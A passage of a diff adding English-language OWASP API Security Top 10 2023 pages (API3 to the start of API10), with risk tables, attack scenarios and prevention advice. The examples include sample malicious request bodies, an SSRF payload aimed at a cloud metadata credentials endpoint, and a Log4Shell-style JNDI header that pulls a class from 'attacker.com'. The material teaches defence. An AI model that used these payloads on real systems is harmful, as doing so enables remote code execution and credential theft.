of a + sensitive object's property which the user should not be able to access + (previously named: "[Mass Assignment][2]") + +## Example Attack Scenarios + +### Scenario #1 + +A dating app allows a user to report other users for inappropriate behavior. +As part of this flow, the user clicks on a "report" button, and the following +API call is triggered: + +``` +POST /graphql +{ + "operationName":"reportUser", + "variables":{ + "userId": 313, + "reason":["offensive behavior"] + }, + "query":"mutation reportUser($userId: ID!, $reason: String!) { + reportUser(userId: $userId, reason: $reason) { + status + message + reportedUser { + id + fullName + recentLocation + } + } + }" +} +``` + +The API Endpoint is vulnerable since it allows the authenticated user to have +access to sensitive (reported) user object properties, such as "fullName" and +"recentLocation" that are not supposed to be accessed by other users. + +### Scenario #2 + +An online marketplace platform, that offers one type of users ("hosts") to rent +out their apartment to another type of users ("guests"), requires the host to +accept a booking made by a guest, before charging the guest for the stay. + +As part of this flow, an API call is sent by the host to +`POST /api/host/approve_booking` with the following legitimate payload: + +``` +{ + "approved": true, + "comment": "Check-in is after 3pm" +} +``` + +The host replays the legitimate request, and adds the following malicious +payload: + +``` +{ + "approved": true, + "comment": "Check-in is after 3pm", + "total_stay_price": "$1,000,000" +} +``` + +The API endpoint is vulnerable because there is no validation that the host +should have access to the internal object property - `total_stay_price`, and +the guest will be charged more than she was supposed to be. + +### Scenario #3 + +A social network that is based on short videos, enforces restrictive content +filtering and censorship. Even if an uploaded video is blocked, the user can +change the description of the video using the following API request: + +``` +PUT /api/video/update_video + +{ + "description": "a funny video about cats" +} +``` + +A frustrated user can replay the legitimate request, and add the following +malicious payload: + +``` +{ + "description": "a funny video about cats", + "blocked": false +} +``` + +The API endpoint is vulnerable because there is no validation if the user +should have access to the internal object property - `blocked`, and the user +can change the value from `true` to `false` and unlock their own blocked +content. + +## How To Prevent + +* When exposing an object using an API endpoint, always make sure that the user + should have access to the object's properties you expose. +* Avoid using generic methods such as `to_json()` and `to_string()`. Instead, + cherry-pick specific object properties you specifically want to return. +* If possible, avoid using functions that automatically bind a client's input + into code variables, internal objects, or object properties + ("Mass Assignment"). +* Allow changes only to the object's properties that should be updated by the + client. +* Implement a schema-based response validation mechanism as an extra layer of + security. As part of this mechanism, define and enforce data returned by all + API methods. +* Keep returned data structures to the bare minimum, according to the + business/functional requirements for the endpoint. + +## References + +### OWASP + +* [API3:2019 Excessive Data Exposure - OWASP API Security Top 10 2019][1] +* [API6:2019 - Mass Assignment - OWASP API Security Top 10 2019][2] +* [Mass Assignment Cheat Sheet][3] + +### External + +* [CWE-213: Exposure of Sensitive Information Due to Incompatible Policies][4] +* [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes][5] + +[1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/ +[2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/ +[3]: https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html +[4]: https://cwe.mitre.org/data/definitions/213.html +[5]: https://cwe.mitre.org/data/definitions/915.html diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md new file mode 100644 index 000000000..cf2862b03 --- /dev/null +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -0,0 +1,173 @@ +# API4:2023 Unrestricted Resource Consumption + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Average** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. | + +## Is the API Vulnerable? + +Satisfying API requests requires resources such as network bandwidth, CPU, +memory, and storage. Sometimes required resources are made available by service +providers via API integrations, and paid for per request, such as sending +emails/SMS/phone calls, biometrics validation, etc. + +An API is vulnerable if at least one of the following limits is missing or set +inappropriately (e.g. too low/high): + +* Execution timeouts +* Maximum allocable memory +* Maximum number of file descriptors +* Maximum number of processes +* Maximum upload file size +* Number of operations to perform in a single API client request (e.g. GraphQL + batching) +* Number of records per page to return in a single request-response +* Third-party service providers' spending limit + +## Example Attack Scenarios + +### Scenario #1 + +A social network implemented a “forgot password” flow using SMS verification, +enabling the user to receive a one time token via SMS in order to reset their +password. + +Once a user clicks on "forgot password" an API call is sent from the user's +browser to the back-end API: + +``` +POST /initiate_forgot_password + +{ + "step": 1, + "user_number": "6501113434" +} +``` + +Then, behind the scenes, an API call is sent from the back-end to a 3rd party +API that takes care of the SMS delivering: + +``` +POST /sms/send_reset_pass_code + +Host: willyo.net + +{ + "phone_number": "6501113434" +} +``` + +The 3rd party provider, Willyo, charges $0.05 per this type of call. + +An attacker writes a script that sends the first API call tens of thousands of +times. The back-end follows and requests Willyo to send tens of thousands of +text messages, leading the company to lose thousands of dollars in a matter of +minutes. + +### Scenario #2 + +A GraphQL API Endpoint allows the user to upload a profile picture. + +``` +POST /graphql + +{ + "query": "mutation { + uploadPic(name: \"pic1\", base64_pic: \"R0FOIEFOR0xJVA…\") { + url + } + }" +} +``` + +Once the upload is complete, the API generates multiple thumbnails with +different sizes based on the uploaded picture. This graphical operation takes a +lot of memory from the server. + +The API implements a traditional rate limiting protection - a user can't access +the GraphQL endpoint too many times in a short period of time. The API also +checks for the uploaded picture's size before generating thumbnails to avoid +processing pictures that are too large. + +An attacker can easily bypass those mechanisms, by leveraging the flexible +nature of GraphQL: + +``` +POST /graphql + +[ + {"query": "mutation {uploadPic(name: \"pic1\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"}, + {"query": "mutation {uploadPic(name: \"pic2\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"}, + ... + {"query": "mutation {uploadPic(name: \"pic999\", base64_pic: \"R0FOIEFOR0xJVA…\") {url}}"}, +} +``` + +Because the API does not limit the number of times the `uploadPic` operation can +be attempted, the call will lead to exhaustion of server memory and Denial of +Service. + +### Scenario #3 + +A service provider allows clients to download arbitrarily large files using its +API. These files are stored in cloud object storage and they don't change that +often. The service provider relies on a cache service to have a better service +rate and to keep bandwidth consumption low. The cache service only caches files +up to 15GB. + +When one of the files gets updated, its size increases to 18GB. All service +clients immediately start pulling the new version. Because there were no +consumption cost alerts, nor a maximum cost allowance for the cloud service, +the next monthly bill increases from US$13, on average, to US$8k. + +## How To Prevent + +* Use a solution that makes it easy to limit [memory][1], + [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such + as Containers / Serverless code (e.g. Lambdas). +* Define and enforce a maximum size of data on all incoming parameters and + payloads, such as maximum length for strings, maximum number of elements in + arrays, and maximum upload file size (regardless of whether it is stored + locally or in cloud storage). +* Implement a limit on how often a client can interact with the API within a + defined timeframe (rate limiting). +* Rate limiting should be fine tuned based on the business needs. Some API + Endpoints might require stricter policies. +* Limit/throttle how many times or how often a single API client/user can + execute a single operation (e.g. validate an OTP, or request password + recovery without visiting the one-time URL). +* Add proper server-side validation for query string and request body + parameters, specifically the one that controls the number of records to be + returned in the response. +* Configure spending limits for all service providers/API integrations. When + setting spending limits is not possible, billing alerts should be configured + instead. + +## References + +### OWASP + +* ["Availability" - Web Service Security Cheat Sheet][5] +* ["DoS Prevention" - GraphQL Cheat Sheet][6] +* ["Mitigating Batching Attacks" - GraphQL Cheat Sheet][7] + +### External + +* [CWE-770: Allocation of Resources Without Limits or Throttling][8] +* [CWE-400: Uncontrolled Resource Consumption][9] +* [CWE-799: Improper Control of Interaction Frequency][10] +* "Rate Limiting (Throttling)" - [Security Strategies for Microservices-based + Application Systems][11], NIST + +[1]: https://docs.docker.com/config/containers/resource_constraints/#memory +[2]: https://docs.docker.com/config/containers/resource_constraints/#cpu +[3]: https://docs.docker.com/engine/reference/commandline/run/#restart +[4]: https://docs.docker.com/engine/reference/commandline/run/#ulimit +[5]: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability +[6]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention +[7]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks +[8]: https://cwe.mitre.org/data/definitions/770.html +[9]: https://cwe.mitre.org/data/definitions/400.html +[10]: https://cwe.mitre.org/data/definitions/799.html +[11]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-204.pdf diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md new file mode 100644 index 000000000..0bb3f432d --- /dev/null +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -0,0 +1,100 @@ +# API5:2023 Broken Function Level Authorization + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. | + +## Is the API Vulnerable? + +The best way to find broken function level authorization issues is to perform +a deep analysis of the authorization mechanism while keeping in mind the user +hierarchy, different roles or groups in the application, and asking the +following questions: + +* Can a regular user access administrative endpoints? +* Can a user perform sensitive actions (e.g. creation, modification, or + deletion ) that they should not have access to by simply changing the HTTP + method (e.g. from `GET` to `DELETE`)? +* Can a user from group X access a function that should be exposed only to + users from group Y, by simply guessing the endpoint URL and parameters + (e.g. `/api/v1/users/export_all`)? + +Don't assume that an API endpoint is regular or administrative only based on +the URL path. + +While developers might choose to expose most of the administrative endpoints +under a specific relative path, like `/api/admins`, it's very common to find +these administrative endpoints under other relative paths together with regular +endpoints, like `/api/users`. + +## Example Attack Scenarios + +### Scenario #1 + +During the registration process for an application that allows only invited +users to join, the mobile application triggers an API call to +`GET /api/invites/{invite_guid}`. The response contains a JSON with details +about the invite, including the user's role and the user's email. + +An attacker duplicates the request and manipulates the HTTP method and endpoint +to `POST /api/invites/new`. This endpoint should only be accessed by +administrators using the admin console. The endpoint does not implement +function level authorization checks. + +The attacker exploits the issue and sends a new invite with admin privileges: + +``` +POST /api/invites/new + +{ + "email": "attacker@somehost.com", + "role":"admin" +} +``` + +Later on, the attacker uses the maliciously crafted invite in order to create +themselves an admin account and gain full access to the system. + +### Scenario #2 + +An API contains an endpoint that should be exposed only to administrators - +`GET /api/admin/v1/users/all`. This endpoint returns the details of all the +users of the application and does not implement function level authorization +checks. An attacker who learned the API structure takes an educated guess and +manages to access this endpoint, which exposes sensitive details of the users +of the application. + +## How To Prevent + +Your application should have a consistent and easy-to-analyze authorization +module that is invoked from all your business functions. Frequently, such +protection is provided by one or more components external to the application +code. + +* The enforcement mechanism(s) should deny all access by default, requiring + explicit grants to specific roles for access to every function. +* Review your API endpoints against function level authorization flaws, while + keeping in mind the business logic of the application and groups hierarchy. +* Make sure that all of your administrative controllers inherit from an + administrative abstract controller that implements authorization checks + based on the user's group/role. +* Make sure that administrative functions inside a regular controller implement + authorization checks based on the user's group and role. + +## References + +### OWASP + +* [Forced Browsing][1] +* "A7: Missing Function Level Access Control", [OWASP Top 10 2013][2] +* [Access Control][3] + +### External + +* [CWE-285: Improper Authorization][4] + +[1]: https://owasp.org/www-community/attacks/Forced_browsing +[2]: https://github.com/OWASP/Top10/raw/master/2013/OWASP%20Top%2010%20-%202013.pdf +[3]: https://owasp.org/www-community/Access_Control +[4]: https://cwe.mitre.org/data/definitions/285.html diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md new file mode 100644 index 000000000..46956d1f4 --- /dev/null +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -0,0 +1,107 @@ +# API6:2023 Unrestricted Access to Sensitive Business Flows + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | +| Exploitation usually involves understanding the business model backed by the API, finding sensitive business flows, and automating access to these flows, causing harm to the business. | Lack of a holistic view of the API in order to fully support business requirements tends to contribute to the prevalence of this issue. Attackers manually identify what resources (e.g. endpoints) are involved in the target workflow and how they work together. If mitigation mechanisms are already in place, attackers need to find a way to bypass them. | In general technical impact is not expected. Exploitation might hurt the business in different ways, for example: prevent legitimate users from purchasing a product, or lead to inflation in the internal economy of a game. | + +## Is the API Vulnerable? + +When creating an API Endpoint, it is important to understand which business flow +it exposes. Some business flows are more sensitive than others, in the sense +that excessive access to them may harm the business. + +Common examples of sensitive business flows and risk of excessive access +associated with them: + +* Purchasing a product flow - an attacker can buy all the stock of a high-demand + item at once and resell for a higher price (scalping) +* Creating a comment/post flow - an attacker can spam the system +* Making a reservation - an attacker can reserve all the available time slots + and prevent other users from using the system + +The risk of excessive access might change between industries and businesses. +For example - creation of posts by a script might be considered as a risk of +spam by one social network, but encouraged by another social network. + +An API Endpoint is vulnerable if it exposes a sensitive business flow, without +appropriately restricting the access to it. + +## Example Attack Scenarios + +### Scenario #1 + +A technology company announces they are going to release a new gaming console on +Thanksgiving. The product has a very high demand and the stock is limited. An +attacker writes code to automatically buy the new product and complete the +transaction. + +On the release day, the attacker runs the code distributed across different IP +addresses and locations. The API doesn't implement the appropriate protection +and allows the attacker to buy the majority of the stock before other legitimate +users. + +Later on, the attacker sells the product on another platform for a much higher +price. + +### Scenario #2 + +An airline company offers online ticket purchasing with no cancellation fee. A +user with malicious intentions books 90% of the seats of a desired flight. + +A few days before the flight the malicious user canceled all the tickets at +once, which forced the airline to discount the ticket prices in order to fill +the flight. + +At this point, the user buys herself a single ticket that is much cheaper than +the original one. + +### Scenario #3 + +A ride-sharing app provides a referral program - users can invite their friends +and gain credit for each friend who has joined the app. This credit can be later +used as cash to book rides. + +An attacker exploits this flow by writing a script to automate the registration +process, with each new user adding credit to the attacker's wallet. + +The attacker can later enjoy free rides or sell the accounts with excessive +credits for cash. + +## How To Prevent + +The mitigation planning should be done in two layers: + +* Business - identify the business flows that might harm the business if they + are excessively used. +* Engineering - choose the right protection mechanisms to mitigate the business + risk. + + Some of the protection mechanisms are more simple while others are more + difficult to implement. The following methods are used to slow down automated + threats: + + * Device fingerprinting: denying service to unexpected client devices (e.g + headless browsers) tends to make threat actors use more sophisticated + solutions, thus more costly for them + * Human detection: using either captcha or more advanced biometric solutions + (e.g. typing patterns) + * Non-human patterns: analyze the user flow to detect non-human patterns (e.g. + the user accessed the "add to cart" and "complete purchase" functions in + less than one second) + * Consider blocking IP addresses of Tor exit nodes and well-known proxies + + Secure and limit access to APIs that are consumed directly by machines (such + as developer and B2B APIs). They tend to be an easy target for attackers + because they often don't implement all the required protection mechanisms. + +## References + +### OWASP + +* [OWASP Automated Threats to Web Applications][1] +* [API10:2019 Insufficient Logging & Monitoring][2] + +[1]: https://owasp.org/www-project-automated-threats-to-web-applications/ +[2]: https://owasp.org/API-Security/editions/2019/en/0xaa-insufficient-logging-monitoring/ + diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md new file mode 100644 index 000000000..70bce4868 --- /dev/null +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -0,0 +1,161 @@ +# API7:2023 Server Side Request Forgery + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | +| Exploitation requires the attacker to find an API endpoint that accesses a URI that’s provided by the client. In general, basic SSRF (when the response is returned to the attacker), is easier to exploit than Blind SSRF in which the attacker has no feedback on whether or not the attack was successful. | Modern concepts in application development encourage developers to access URIs provided by the client. Lack of or improper validation of such URIs are common issues. Regular API requests and response analysis will be required to detect the issue. When the response is not returned (Blind SSRF) detecting the vulnerability requires more effort and creativity. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | + +## Is the API Vulnerable? + +Server-Side Request Forgery (SSRF) flaws occur when an API is fetching a remote +resource without validating the user-supplied URL. It enables an attacker to +coerce the application to send a crafted request to an unexpected destination, +even when protected by a firewall or a VPN. + +Modern concepts in application development make SSRF more common and more +dangerous. + +More common - the following concepts encourage developers to access an external +resource based on user input: Webhooks, file fetching from URLs, custom SSO, +and URL previews. + +More dangerous - Modern technologies like cloud providers, Kubernetes, and +Docker expose management and control channels over HTTP on predictable, +well-known paths. Those channels are an easy target for an SSRF attack. + +It is also more challenging to limit outbound traffic from your application, +because of the connected nature of modern applications. + +The SSRF risk can not always be completely eliminated. While choosing a +protection mechanism, it is important to consider the business risks and needs. + +## Example Attack Scenarios + +### Scenario #1 + +A social network allows users to upload profile pictures. The user can choose +either to upload the image file from their machine, or provide the URL of the +image. Choosing the second, will trigger the following API call: + +``` +POST /api/profile/upload_picture + +{ + "picture_url": "http://example.com/profile_pic.jpg" +} +``` + +An attacker can send a malicious URL and initiate port scanning within the +internal network using the API Endpoint. + +``` +{ + "picture_url": "localhost:8080" +} +``` + +Based on the response time, the attacker can figure out whether the port is +open or not. + +### Scenario #2 + +A security product generates events when it detects anomalies in the network. +Some teams prefer to review the events in a broader, more generic monitoring +system, such as a SIEM (Security Information and Event Management). For this +purpose, the product provides integration with other systems using webhooks. + +As part of a creation of a new webhook, a GraphQL mutation is sent with the URL +of the SIEM API. + +``` +POST /graphql + +[ + { + "variables": {}, + "query": "mutation { + createNotificationChannel(input: { + channelName: \"ch_piney\", + notificationChannelConfig: { + customWebhookChannelConfigs: [ + { + url: \"http://www.siem-system.com/create_new_event\", + send_test_req: true + } + ] + } + }){ + channelId + } + }" + } +] + +``` + +During the creation process, the API back-end sends a test request to the +provided webhook URL, and presents to the user the response. + +An attacker can leverage this flow, and make the API request a sensitive +resource, such as an internal cloud metadata service that exposes credentials: + +``` +POST /graphql + +[ + { + "variables": {}, + "query": "mutation { + createNotificationChannel(input: { + channelName: \"ch_piney\", + notificationChannelConfig: { + customWebhookChannelConfigs: [ + { + url: \"http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-default-ssm\", + send_test_req: true + } + ] + } + }) { + channelId + } + } + } +] +``` + +Since the application shows the response from the test request, the attacker +can view the credentials of the cloud environment. + +## How To Prevent + +* Isolate the resource fetching mechanism in your network: usually these + features are aimed to retrieve remote resources and not internal ones. +* Whenever possible, use allow lists of: + * Remote origins users are expected to download resources from (e.g. Google + Drive, Gravatar, etc.) + * URL schemes and ports + * Accepted media types for a given functionality +* Disable HTTP redirections. +* Use a well-tested and maintained URL parser to avoid issues caused by URL + parsing inconsistencies. +* Validate and sanitize all client-supplied input data. +* Do not send raw responses to clients. + +## References + +### OWASP + +* [Server Side Request Forgery][1] +* [Server-Side Request Forgery Prevention Cheat Sheet][2] + +### External + +* [CWE-918: Server-Side Request Forgery (SSRF)][3] +* [URL confusion vulnerabilities in the wild: Exploring parser inconsistencies, + Snyk][4] + +[1]: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery +[2]: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html +[3]: https://cwe.mitre.org/data/definitions/918.html +[4]: https://snyk.io/blog/url-confusion-vulnerabilities/ diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md new file mode 100644 index 000000000..c2dd4b98a --- /dev/null +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -0,0 +1,130 @@ +# API8:2023 Security Misconfiguration + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Attackers will often attempt to find unpatched flaws, common endpoints, services running with insecure default configurations, or unprotected files and directories to gain unauthorized access or knowledge of the system. Most of this is public knowledge and exploits may be available. | Security misconfiguration can happen at any level of the API stack, from the network level to the application level. Automated tools are available to detect and exploit misconfigurations such as unnecessary services or legacy options. | Security misconfigurations not only expose sensitive user data, but also system details that can lead to full server compromise. | + +## Is the API Vulnerable? + +The API might be vulnerable if: + +* Appropriate security hardening is missing across any part of the API stack, + or if there are improperly configured permissions on cloud services +* The latest security patches are missing, or the systems are out of date +* Unnecessary features are enabled (e.g. HTTP verbs, logging features) +* There are discrepancies in the way incoming requests are processed by servers + in the HTTP server chain +* Transport Layer Security (TLS) is missing +* Security or cache control directives are not sent to clients +* A Cross-Origin Resource Sharing (CORS) policy is missing or improperly set +* Error messages include stack traces, or expose other sensitive information + +## Example Attack Scenarios + +### Scenario #1 + +An API back-end server maintains an access log written by a popular third-party +open-source logging utility with support for placeholder expansion and JNDI +(Java Naming and Directory Interface) lookups, both enabled by default. For +each request, a new entry is written to the log file with the following +pattern: ` / - `. + +A bad actor issues the following API request, which gets written to the access +log file: + +``` +GET /health +X-Api-Version: ${jndi:ldap://attacker.com/Malicious.class} +``` + +Due to the insecure default configuration of the logging utility and a +permissive network outbound policy, in order to write the corresponding entry +to the access log, while expanding the value in the `X-Api-Version` request +header, the logging utility will pull and execute the `Malicious.class` object +from the attacker's remote controlled server. + +### Scenario #2 + +A social network website offers a "Direct Message" feature that allows users to +keep private conversations. To retrieve new messages for a specific +conversation, the website issues the following API request (user interaction is +not required): + +``` +GET /dm/user_updates.json?conversation_id=1234567&cursor=GRlFp7LCUAAAA +``` + +Because the API response does not include the `Cache-Control` HTTP response +header, private conversations end-up cached by the web browser, allowing +malicious actors to retrieve them from the browser cache files in the +filesystem. + +## How To Prevent + +The API life cycle should include: + +* A repeatable hardening process leading to fast and easy deployment of a + properly locked down environment +* A task to review and update configurations across the entire API stack. The + review should include: orchestration files, API components, and cloud + services (e.g. S3 bucket permissions) +* An automated process to continuously assess the effectiveness of the + configuration and settings in all environments + +Furthermore: + +* Ensure that all API communications from the client to the API server and any + downstream/upstream components happen over an encrypted communication channel + (TLS), regardless of whether it is an internal or public-facing API. +* Be specific about which HTTP verbs each API can be accessed by: all other + HTTP verbs should be disabled (e.g. HEAD). +* APIs expecting to be accessed from browser-based clients (e.g., WebApp + front-end) should, at least: + * implement a proper Cross-Origin Resource Sharing (CORS) policy + * include applicable Security Headers +* Restrict incoming content types/data formats to those that meet the business/ + functional requirements. +* Ensure all servers in the HTTP server chain (e.g. load balancers, reverse + and forward proxies, and back-end servers) process incoming requests in a + uniform manner to avoid desync issues. +* Where applicable, define and enforce all API response payload schemas, + including error responses, to prevent exception traces and other valuable + information from being sent back to attackers. + +## References + +### OWASP + +* [OWASP Secure Headers Project][1] +* [Configuration and Deployment Management Testing - Web Security Testing + Guide][2] +* [Testing for Error Handling - Web Security Testing Guide][3] +* [Testing for Cross Site Request Forgery - Web Security Testing Guide][4] + +### External + +* [CWE-2: Environmental Security Flaws][5] +* [CWE-16: Configuration][6] +* [CWE-209: Generation of Error Message Containing Sensitive Information][7] +* [CWE-319: Cleartext Transmission of Sensitive Information][8] +* [CWE-388: Error Handling][9] +* [CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response + Smuggling')][10] +* [CWE-942: Permissive Cross-domain Policy with Untrusted Domains][11] +* [Guide to General Server Security][12], NIST +* [Let's Encrypt: a free, automated, and open Certificate Authority][13] + +[1]: https://owasp.org/www-project-secure-headers/ +[2]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/README +[3]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/README +[4]: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery +[5]: https://cwe.mitre.org/data/definitions/2.html +[6]: https://cwe.mitre.org/data/definitions/16.html +[7]: https://cwe.mitre.org/data/definitions/209.html +[8]: https://cwe.mitre.org/data/definitions/319.html +[9]: https://cwe.mitre.org/data/definitions/388.html +[10]: https://cwe.mitre.org/data/definitions/444.html +[11]: https://cwe.mitre.org/data/definitions/942.html +[12]: https://csrc.nist.gov/publications/detail/sp/800-123/final +[13]: https://letsencrypt.org/ diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md new file mode 100644 index 000000000..64458f478 --- /dev/null +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md @@ -0,0 +1,105 @@ +# API9:2023 Improper Inventory Management + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Average** | Technical **Moderate** : Business Specific | +| Threat agents usually get unauthorized access through old API versions or endpoints left running unpatched and using weaker security requirements. In some cases exploits are available. Alternatively, they may get access to sensitive data through a 3rd party with whom there's no reason to share data with. | Outdated documentation makes it more difficult to find and/or fix vulnerabilities. Lack of assets inventory and retirement strategies leads to running unpatched systems, resulting in leakage of sensitive data. It's common to find unnecessarily exposed API hosts because of modern concepts like microservices, which make applications easy to deploy and independent (e.g. cloud computing, K8S). Simple Google Dorking, DNS enumeration, or using specialized search engines for various types of servers (webcams, routers, servers, etc.) connected to the internet will be enough to discover targets. | Attackers can gain access to sensitive data, or even take over the server. Sometimes different API versions/deployments are connected to the same database with real data. Threat agents may exploit deprecated endpoints available in old API versions to get access to administrative functions or exploit known vulnerabilities. | + +## Is the API Vulnerable? + +The sprawled and connected nature of APIs and modern applications brings new +challenges. It is important for organizations not only to have a good +understanding and visibility of their own APIs and API endpoints, but also how +the APIs are storing or sharing data with external third parties. + +Running multiple versions of an API requires additional management resources +from the API provider and expands the attack surface. + +An API has a "documentation blindspot" if: + +* The purpose of an API host is unclear, and there are no explicit answers to + the following questions + * Which environment is the API running in (e.g. production, staging, test, + development)? + * Who should have network access to the API (e.g. public, internal, partners)? + * Which API version is running? +* There is no documentation or the existing documentation is not updated. +* There is no retirement plan for each API version. +* The host's inventory is missing or outdated. + +The visibility and inventory of sensitive data flows play an important role as +part of an incident response plan, in case a breach happens on the third party +side. + +An API has a "data flow blindspot" if: + +* There is a "sensitive data flow" where the API shares sensitive data with a + third party and + * There is not a business justification or approval of the flow + * There is no inventory or visibility of the flow + * There is not deep visibility of which type of sensitive data is shared + + +## Example Attack Scenarios + +### Scenario #1 + +A social network implemented a rate-limiting mechanism that blocks attackers +from using brute force to guess reset password tokens. This mechanism wasn't +implemented as part of the API code itself but in a separate component between +the client and the official API (`api.socialnetwork.owasp.org`). A researcher +found a beta API host (`beta.api.socialnetwork.owasp.org`) that runs the same +API, including the reset password mechanism, but the rate-limiting mechanism was +not in place. The researcher was able to reset the password of any user by using +simple brute force to guess the 6 digit token. + +### Scenario #2 + +A social network allows developers of independent apps to integrate with it. As +part of this process a consent is requested from the end user, so the social +network can share the user's personal information with the independent app. + +The data flow between the social network and the independent apps is not +restrictive or monitored enough, allowing independent apps to access not only +the user information but also the private information of all of their friends. + +A consulting firm builds a malicious app and manages to get the consent of +270,000 users. Because of the flaw, the consulting firm manages to get access +to the private information of 50,000,000 users. Later, the consulting firm +sells the information for malicious purposes. + +## How To Prevent + +* Inventory all API hosts and document important aspects of each one + of them, focusing on the API environment (e.g. production, staging, test, + development), who should have network access to the host (e.g. public, + internal, partners) and the API version. +* Inventory integrated services and document important aspects such + as their role in the system, what data is exchanged (data flow), and their + sensitivity. +* Document all aspects of your API such as authentication, errors, redirects, + rate limiting, cross-origin resource sharing (CORS) policy, and endpoints, + including their parameters, requests, and responses. +* Generate documentation automatically by adopting open standards. Include the + documentation build in your CI/CD pipeline. +* Make API documentation available only to those authorized to use the API. +* Use external protection measures such as API security specific solutions for + all exposed versions of your APIs, not just for the current production + version. +* Avoid using production data with non-production API deployments. If this is + unavoidable, these endpoints should get the same security treatment as the + production ones. +* When newer versions of APIs include security improvements, perform a risk + analysis to inform the mitigation actions required for the older versions. + For example, whether it is possible to backport the improvements without + breaking API compatibility or if you need to take the older version out + quickly and force all clients to move to the latest version. + + +## References + +### External + +* [CWE-1059: Incomplete Documentation][1] + +[1]: https://cwe.mitre.org/data/definitions/1059.html diff --git a/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md new file mode 100644 index 000000000..016b1ddba --- /dev/null +++ b/editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md @@ -0,0 +1,108 @@ +# API10:2023 Unsafe Consumption of APIs + +| Threat agents/Attack vectors | Security Weakness | Impacts | +| - | - | - | +| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Average** | Technical **Severe** : Business Specific | +| Exploiting this issue requires attackers to identify and potentially compromise other APIs/services the target API integrated with. Usually, this information is not publicly available or the integrated API/service is not easily 